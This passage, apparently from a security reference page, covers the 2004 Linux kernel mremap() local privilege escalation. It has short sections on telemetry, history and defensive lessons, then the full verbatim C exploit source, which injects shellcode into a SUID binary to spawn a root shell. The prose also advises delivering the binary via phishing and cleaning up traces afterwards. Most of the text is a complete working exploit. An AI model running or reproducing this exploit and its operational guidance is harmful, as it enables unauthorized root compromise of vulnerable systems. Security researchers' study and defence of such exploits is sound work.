mmapcalls and potential error messages. It's best used in controlled environments or during specific phases of an engagement where noise is less of a concern. - Payload Delivery: The exploit binary needs to be delivered to the target. This can be done via phishing, social engineering, or by leveraging another vulnerability to gain initial access.
- Post-Exploitation: After gaining root, the attacker should clean up the exploit binary and any associated files. The injected shellcode will execute the chosen shell, providing a root shell.
- SUID Binary Choice: While
/bin/pingis a common example, other SUID binaries could be targeted. The choice might depend on what is available and what is least likely to be monitored.
- Stealth: Running this exploit can be noisy due to extensive
- Expected Telemetry:
- Process Execution: Creation of the
mremap_pteprocess. - System Calls: A high volume of
mmap,mprotect,munmap,mremap,clone,waitpid, andexecvesystem calls. - Memory Usage: Significant increase in memory allocation and usage.
- SUID Binary Execution: The execution of the target SUID binary (e.g.,
/bin/ping) will be observed, but it will be followed by the execution of/bin/bash(or the chosen shell) with root privileges. - Kernel Logs: Potential kernel panics or error messages if the exploit triggers unexpected behavior or if defenses are in place.
- File System Activity: Creation and deletion of the exploit binary.
- Process Execution: Creation of the
Where this was used and when
This exploit was published in March 2004 by iSEC Security Research. It targeted specific, older versions of the Linux kernel (2.2.25, 2.4.24, and 2.6.2). Exploits of this nature were common in the early to mid-2000s as kernel memory management and security features were less mature. While it's unlikely to be directly effective against modern, patched Linux systems, it represents a significant historical vulnerability that informed the development of more robust kernel security. Its usage would have been limited to systems running these specific, outdated kernel versions, likely in research, development, or legacy environments.
Defensive lessons for modern teams
- Kernel Patching: The most crucial defense is to keep the kernel updated. This exploit targets known vulnerabilities that have long been patched.
- System Call Auditing: Monitoring for unusual or excessive use of system calls like
mremap,mmap, andmprotectcan help detect exploitation attempts. - Memory Protection: Modern kernels have stronger memory protection mechanisms, including more robust checks within system calls and better management of VMAs.
- SUID Binary Security: Limiting the number of SUID binaries and carefully auditing their permissions and integrity is essential. Tools like
find / -perm -4000 -type fcan list SUID binaries. - Intrusion Detection Systems (IDS): Network and host-based IDS can be configured to detect patterns of suspicious system call activity or known exploit signatures.
- Security Modules: SELinux and AppArmor can significantly restrict what processes can do, even if they achieve privilege escalation, by enforcing mandatory access control policies.
- Principle of Least Privilege: Users and processes should only have the minimum privileges necessary to perform their functions, reducing the impact of any successful privilege escalation.
ASCII visual (if applicable)
This exploit's core mechanism involves manipulating kernel memory management structures. A simplified visual representation of the memory mapping and remapping process can be helpful.
+-----------------+ +-----------------+ +-----------------+
| Initial Memory | | After mmap | | After mremap |
| Mapping (VMA1) |----->| (VMA1 unmapped, |----->| (VMA1 moved/ |
| | | VMA2 created) | | corrupted, |
+-----------------+ +-----------------+ | VMA3 created) |
+-----------------+
^
|
| Vulnerable
| mremap()
| with bad
| do_munmap
| return checkExplanation:
- Initial Memory Mapping: A region of memory is mapped.
- After
mmap(and preparation): The exploit usesmmapextensively to prepare pages and potentially exhaust memory. This creates new VMAs. - After
mremap: Themremapcall attempts to move or resize a memory region. In the vulnerable kernel, ifdo_munmap(which unmaps the old region) fails internally, themremapmight proceed. This can lead to:- The original memory region not being properly unmapped.
- A new mapping being created or an existing one being corrupted.
- The exploit's shellcode being placed where the SUID binary's code should be.
This diagram is a high-level abstraction. The actual exploit involves intricate manipulation of page tables (PTs) and page directory entries (PDEs) by carefully crafted mmap and mremap calls.
Source references
- Paper ID: 160
- Paper Title: Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation
- Author: Paul Starzetz
- Published: 2004-03-01
- Keywords: Linux, local
- Paper URL: https://www.exploit-db.com/papers/160
- Raw URL: https://www.exploit-db.com/raw/160
Original Exploit-DB Content (Verbatim)
/*
*
* mremap missing do_munmap return check kernel exploit
*
* gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
* ./mremap_pte [suid] [[shell]]
*
* Vulnerable kernel versions are all <= 2.2.25, <= 2.4.24 and <= 2.6.2
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <asm/page.h>
// Two-level stringification: xstr() expands its argument before str() quotes
// it, so macro values such as __NR_execve can be spliced into the inline-asm
// strings further down.
#define str(s) #s
#define xstr(s) str(s)
// this is for standard kernels with 3/1 split
#define STARTADDR 0x40000000
// PAGE_SIZE * 1024 bytes; presumably the address span covered by one page
// table (1024 entries) on 32-bit x86 -- TODO confirm for the target kernel.
#define PGD_SIZE (PAGE_SIZE * 1024)
// Destination address passed to sys_mremap() in exhaust().
#define VICTIM (STARTADDR + PGD_SIZE)
// First address used by the one-page mmap() loop in exhaust().
#define MMAP_BASE (STARTADDR + 3*PGD_SIZE)
// Flags loaded into %ebx for the raw clone syscall in cloneme().
#define DSIGNAL SIGCHLD
#define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM)
// Local definitions of the mremap() flag bits used in exhaust().
#define MREMAP_MAYMOVE ( (1UL) << 0 )
#define MREMAP_FIXED ( (1UL) << 1 )
// Alias so that a stub named sys_mremap can find a syscall number;
// presumably _syscall5 looks up __NR_<name> -- verify against the kernel
// headers this was built with.
#define __NR_sys_mremap __NR_mremap
// how many ld.so pages? this is the .text section length (like cat
// /proc/self/maps) in pages
#define LINKERPAGES 0x14
// suid victim
// (default; main() replaces it with av[1] when given)
static char *suid="/bin/ping";
// shell to start
// (default; main() replaces it with av[2] when given)
static char *launch="/bin/bash";
// Generates the sys_mremap() syscall stub. _syscall5 is not defined in this
// file; it is assumed to come from the included kernel headers.
_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
unsigned long new_len, unsigned long flags,
unsigned long new_addr);
// Working state shared by the helpers below:
//   base    - next address mapped by the loop in exhaust()
//   t       - result of the most recent mmap() call
//   cnt     - number of loop mappings created so far
//   old_esp - page-aligned stack pointer stored by get_esp()
//   prot    - protection bits for the next loop mapping
//   victim  - address of the donor region; initialised to 0 and not
//             reassigned anywhere in this listing
static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;
// i: loop counter / mprotect() result in exhaust(); pid: written by cloneme().
static int i, pid=0;
// Environment and argument vectors referenced by my_execve().
static char *env[2], *argv[2];
// Receives the sys_mremap() result in exhaust() and the %eax output of
// my_execve().
static ulong ret;
// code to appear inside the suid image
//
// Position-independent i386 payload. pte_populate() copies the bytes between
// suid_code and suid_code_end to the tail of a page and writes the `launch`
// path at the start of that same page; the code below locates that path by
// rounding its own address down to a page boundary.
// NOTE(review): the copy starts at the function's entry address, so it relies
// on the compiler emitting no prologue that would break when relocated
// (the build line uses -fomit-frame-pointer) -- confirm for your toolchain.
static void suid_code(void)
{
__asm__(
// call/jmp pair: the call pushes the address of `jumpme` on the stack, then
// `callme` jumps straight back to it. The pushed value is popped later to
// learn where this code is running.
" call callme \n"
// setresuid(0, 0, 0), setresgid(0, 0, 0)
"jumpme: xorl %ebx, %ebx \n"
" xorl %ecx, %ecx \n"
" xorl %edx, %edx \n"
" xorl %eax, %eax \n"
" mov $"xstr(__NR_setresuid)", %al \n"
" int $0x80 \n"
// Only %al is reloaded here; the upper bytes of %eax still hold the previous
// syscall's return value, so this assumes that call returned 0.
" mov $"xstr(__NR_setresgid)", %al \n"
" int $0x80 \n"
// execve(launch)
// Pop the address pushed by `call`, mask it down to the page start (where
// pte_populate() stored the path), then build on the stack:
//   %edx -> a single NULL word (envp)
//   %ecx -> { path, NULL }     (argv)
" popl %ebx \n"
" andl $0xfffff000, %ebx \n"
" xorl %eax, %eax \n"
" pushl %eax \n"
" movl %esp, %edx \n"
" pushl %ebx \n"
" movl %esp, %ecx \n"
" mov $"xstr(__NR_execve)", %al \n"
" int $0x80 \n"
// exit
// Reached only if execve returned.
" xorl %eax, %eax \n"
" mov $"xstr(__NR_exit)", %al \n"
" int $0x80 \n"
"callme: jmp jumpme \n"
);
}
// End marker for the payload: pte_populate() subtracts the address of
// suid_code from the address of this function to get the number of bytes to
// copy. The body only needs to exist; it returns its argument plus one.
static int suid_code_end(int v)
{
    int next = v;

    next += 1;
    return next;
}
// Stores the current stack pointer, rounded down to a 4 KiB boundary
// (mask 0xfffff000), into the global old_esp.
// NOTE(review): old_esp is written by the asm but is declared as an input
// operand, and %eax is modified without appearing in a clobber list; the
// compiler is therefore not told about either side effect.
static inline void get_esp(void)
{
__asm__(
" movl %%esp, %%eax \n"
" andl $0xfffff000, %%eax \n"
" movl %%eax, %0 \n"
: : "m"(old_esp)
);
}
// Issues the clone syscall directly via int $0x80 with flags CLONEFL
// (SIGCHLD | CLONE_VFORK | CLONE_VM) and stores the syscall's return value
// in the global pid.
// %ecx (the new task's stack pointer argument) is set to the caller's
// current %esp, so both tasks continue on the same stack address.
// pusha/popa save and restore the general-purpose registers around the call.
// NOTE(review): pid is written by the asm but declared as an input operand;
// the CLONEFL text is pasted into the asm string, so the assembler must be
// able to evaluate the expanded flag expression -- confirm with the headers
// in use.
static inline void cloneme(void)
{
__asm__(
" pusha \n"
" movl $("xstr(CLONEFL)"), %%ebx \n"
" movl %%esp, %%ecx \n"
" movl $"xstr(__NR_clone)", %%eax \n"
" int $0x80 \n"
" movl %%eax, %0 \n"
" popa \n"
: : "m"(pid)
);
}
// Issues the execve syscall directly via int $0x80, loading %ebx, %ecx and
// %edx from the globals suid, argv and env respectively. The value left in
// %eax is stored in the global ret.
// NOTE(review): argv and env are arrays passed as "m" operands and read with
// movl; confirm whether this yields the arrays' addresses or their first
// elements with the compiler in use. %ebx/%ecx/%edx are modified without
// being listed as clobbers.
static inline void my_execve(void)
{
__asm__(
" movl %1, %%ebx \n"
" movl %2, %%ecx \n"
" movl %3, %%edx \n"
" movl $"xstr(__NR_execve)", %%eax \n"
" int $0x80 \n"
: "=a"(ret)
: "m"(suid), "m"(argv), "m"(env)
);
}
// Prepares one page at `addr`:
//   1. fills the whole page with 0x90 bytes,
//   2. copies the machine code of suid_code() so that it ends one byte
//      before the end of the page (the final byte stays 0x90),
//   3. writes the NUL-terminated `launch` path at the start of the page.
// addr: start address of a writable page (callers pass page-aligned values).
// NOTE(review): memset/memcpy/strlen are used here but <string.h> is not
// among the includes at the top of this listing.
static inline void pte_populate(unsigned addr)
{
unsigned r;
char *ptr;
memset((void*)addr, 0x90, PAGE_SIZE);
// Payload length = distance between the two function addresses; this relies
// on suid_code_end being placed directly after suid_code in the binary.
r = ((unsigned)suid_code_end) - ((unsigned)suid_code);
ptr = (void*) (addr + PAGE_SIZE);
ptr -= r+1;
memcpy(ptr, suid_code, r);
memcpy((void*)addr, launch, strlen(launch)+1);
}
// hit VMA limit & populate PTEs
//
// Sequence performed (order matters):
//   1. map a read/write anonymous "donor" region of LINKERPAGES+3 pages at
//      `victim`, fill pages 2..LINKERPAGES via pte_populate(), then make the
//      region read-only;
//   2. map single pages upward from MMAP_BASE until mmap() fails with ENOMEM;
//   3. call sys_mremap() to move part of the donor region to VICTIM;
//   4. unmap the filler pages, save one word from the stack page, and unmap
//      the range from VICTIM-PAGE_SIZE up to old_esp.
// Prints "[+] Success" and returns, or prints "[-] Failed" and calls
// _exit(0) on any checked error.
// Requires get_esp() to have been called first (old_esp is used below).
static void exhaust(void)
{
// mmap PTE donor
// `victim` is 0 in this listing, so with MAP_FIXED the region starts at
// address 0.
t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED==t)
goto failed;
// prepare shell code pages
for(i=2; i<LINKERPAGES+1; i++)
pte_populate(victim + PAGE_SIZE*i);
i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);
if(i)
goto failed;
// lock unmap
base = MMAP_BASE;
cnt = 0;
prot = PROT_READ;
printf("\n"); fflush(stdout);
// Map one page per iteration at increasing addresses. PROT_EXEC is toggled
// each time so neighbouring pages get different protections -- presumably to
// keep them from being merged into one VMA. The loop ends when mmap()
// reports ENOMEM; any other error aborts.
for(;;) {
t = mmap((void*)base, PAGE_SIZE, prot,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED==t) {
if(ENOMEM==errno)
break;
else
goto failed;
}
// Progress output. Only the printf is governed by the if; the fflush on the
// following line runs on every iteration.
if( !(cnt%512) || cnt>65520 )
printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base,
base+PAGE_SIZE); fflush(stdout);
base += PAGE_SIZE;
prot ^= PROT_EXEC;
cnt++;
}
// move PTEs & populate page table cache
// Shrinks LINKERPAGES pages starting at victim+PAGE_SIZE to a single page
// and moves it to the fixed address VICTIM.
ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,
MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);
// ret is unsigned; -1 is converted to the all-ones value for this comparison.
if(-1==ret)
goto failed;
// Release everything from MMAP_BASE up to the saved stack page address.
munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);
t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE,
PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0,
0);
if(MAP_FAILED==t)
goto failed;
// Copy the first word of the stack page into the page just mapped.
*t = *((unsigned *)old_esp);
// NOTE(review): arithmetic on a void* is a GNU C extension; the cast binds
// before the subtraction, giving VICTIM - PAGE_SIZE as the start address.
munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));
printf("\n[+] Success\n\n"); fflush(stdout);
return;
failed:
printf("\n[-] Failed\n"); fflush(stdout);
_exit(0);
}
// Reads the running kernel's release string via uname(), parses it as
// "major.minor.patch", and classifies it against a built-in table.
// Prints the verdict; returns only when the release is classified as both
// vulnerable and exploitable, otherwise terminates the process with
// _exit(0). A release that does not parse as three integers, or whose major
// number is not 2, is rejected with an error message.
static inline void check_kver(void)
{
    static struct utsname info;
    int major = 0, minor = 0, patch = 0;
    int vulnerable = 0, exploitable = 0;
    int fields;

    uname(&info);
    fields = sscanf(info.release, "%d.%d.%d", &major, &minor, &patch);
    if (fields != 3 || major != 2) {
        printf("\n[-] invalid kernel version string\n");
        _exit(0);
    }

    switch (minor) {
    case 2:
        // 2.2.x: flagged vulnerable up to .25, never exploitable here
        if (patch <= 25)
            vulnerable = 1;
        break;
    case 3:
        if (patch <= 99)
            vulnerable = 1;
        break;
    case 4:
        // 2.4.x: .19-.24 vulnerable and exploitable, above .24 neither,
        // .18 and below vulnerable only
        if (patch > 24) {
            vulnerable = 0;
            exploitable = 0;
        } else if (patch > 18) {
            vulnerable = 1;
            exploitable = 1;
        } else {
            vulnerable = 1;
            exploitable = 0;
        }
        break;
    case 5:
        if (patch <= 75) {
            vulnerable = 1;
            exploitable = 1;
        }
        break;
    case 6:
        if (patch <= 2) {
            vulnerable = 1;
            exploitable = 1;
        }
        break;
    default:
        break;
    }

    printf("\n[+] kernel %s vulnerable: %s exploitable %s",
           info.release,
           vulnerable ? "YES" : "NO",
           exploitable ? "YES" : "NO");
    fflush(stdout);

    if (!(vulnerable && exploitable))
        _exit(0);
}
// Entry point.
// Usage (from the file header): ./mremap_pte [suid] [[shell]]
//   av[1] - optional path replacing the default `suid` target
//   av[2] - optional path replacing the default `launch` program
// Flow: kernel version gate -> argument setup -> record stack page ->
// exhaust() -> cloneme() -> the task that sees pid == 0 calls my_execve(),
// the other waits for it. Always returns 0.
int main(int ac, char **av)
{
// prepare
// check_kver() does not return unless the running kernel passes its table.
check_kver();
memset(env, 0, sizeof(env));
memset(argv, 0, sizeof(argv));
if(ac>1) suid=av[1];
if(ac>2) launch=av[2];
argv[0] = suid;
// Must run before exhaust(), which reads old_esp.
get_esp();
// mmap & clone & execve
exhaust();
cloneme();
// pid holds the clone syscall's return value as stored by cloneme().
if(!pid) {
my_execve();
} else {
waitpid(pid, 0, 0);
}
return 0;
}
// milw0rm.com [2004-03-01]